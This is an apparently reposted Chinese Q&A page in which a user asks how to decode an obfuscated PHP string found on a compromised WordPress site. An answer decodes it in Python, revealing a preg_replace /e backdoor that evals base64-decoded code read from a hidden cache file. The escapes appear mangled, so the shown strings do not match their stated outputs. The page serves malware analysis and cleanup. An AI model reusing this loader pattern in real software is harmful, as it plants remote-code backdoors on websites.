php – 如何解码这个WordPress黑客？

发布时间：2020-12-13 13:56:05 所属栏目：PHP教程来源：网络整理

导读：我在客户端的WordPress驱动的网站上发现了一个令人讨厌的字符串,我只是想知道它的作用. @preg_replace("x4050x2e53x29100x69145","x65166x61154x28142x61163x6566x34137x64145x63157x64145x28151x6d160x6c157x64145x284

我在客户端的WordPress驱动的网站上发现了一个令人讨厌的字符串,我只是想知道它的作用.

@preg_replace("x4050x2e53x29100x69145","x65166x61154x28142x61163x6566x34137x64145x63157x64145x28151x6d160x6c157x64145x2842x5c156x2254x66151x6c145x28142x61163x6566x34137x64145x63157x64145x2842x5c61x2251x2951x2951x3b","x4c62x68166x62127x55166x6462x56151x4c63x56172x5a130x4a172x4c172x49167x4d152x6b165x59155x6c156x4e151x39172x61130x52154x63171x39151x61127x6362x4c63x4261x59155x78160x5961x39157x64107x31163x4c62x5a166x63156x56164x4c62x4a151x4c127x6c165x5962x7861x5a107x56172x4c62x70172x4c62x70170x64127x56171x65123x38165x5962x46152x61107x55166x4c151x5564x4d152x68106x4a124x41167x4d124x4d154x51152x68107x4d171x56103x51172x46103x4a125x49171x4d153x49154x4e105x5961x4e167x3d75");

有人可以概述解码这个步骤吗？我知道preg_replace()是什么,但我不知道如何解码函数的参数,或者PHP如何将它处理成它可以使用的东西.

有趣.我喜欢使用python来完成这种任务.您可以在python(3.x)命令行中跟随：

输入：

print(b"x4050x2e53x29100x69145")

输出：

b'@(.+)@ie'

输入：

print(b"x65166x61154x28142x61163x6566x34137x64145x63157x64145x28151x6d160x6c157x64145x2842x5c156x2254x66151x6c145x28142x61163x6566x34137x64145x63157x64145x2842x5c61x2251x2951x2951x3b","x4c62x68166x62127x55166x6462x56151x4c63x56172x5a130x4a172x4c172x49167x4d152x6b165x59155x6c156x4e151x39172x61130x52154x63171x39151x61127x6362x4c63x4261x59155x78160x5961x39157x64107x31163x4c62x5a166x63156x56164x4c62x4a151x4c127x6c165x5962x7861x5a107x56172x4c62x70172x4c62x70170x64127x56171x65123x38165x5962x46152x61107x55166x4c151x5564x4d152x68106x4a124x41167x4d124x4d154x51152x68107x4d171x56103x51172x46103x4a125x49171x4d153x49154x4e105x5961x4e167x3d75")

输出：

b'eval(base64_decode(implode("n",file(base64_decode("1")))));' L2hvbWUvd2ViL3VzZXJzLzIwMjkuYmlnNi9zaXRlcy9iaWc2L3B1YmxpY19odG1sL2ZvcnVtL2JiLWluY2x1ZGVzL2pzL2pxdWVyeS8uY2FjaGUvLiU4MjhFJTAwMTMlQjhGMyVCQzFCJUIyMkIlNEY1Nw==

那块垃圾是base64,正如调用所暗示的那样,让我们??继续前行.

输入：

import base64
base64.b64decode(b"L2hvbWUvd2ViL3VzZXJzLzIwMjkuYmlnNi9zaXRlcy9iaWc2L3B1YmxpY19odG1sL2ZvcnVtL2JiLWluY2x1ZGVzL2pzL2pxdWVyeS8uY2FjaGUvLiU4MjhFJTAwMTMlQjhGMyVCQzFCJUIyMkIlNEY1Nw==")

输出：

b'/home/web/users/2029.big6/sites/big6/public_html/forum/bb-includes/js/jquery/.cache/.%828E%0013%B8F3%BC1B%B22B%4F57'

看起来好好了解发生了什么,在网站的其余部分需要仔细查看,特别是它引用的文件;它可能充满了更多的base64编码代码.我认为可以安全地假设该网站遭到了很好的破坏,但是最好还是拉出内容并清除这样的内容,然后重新开始使用新实例.

（编辑：李大同）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!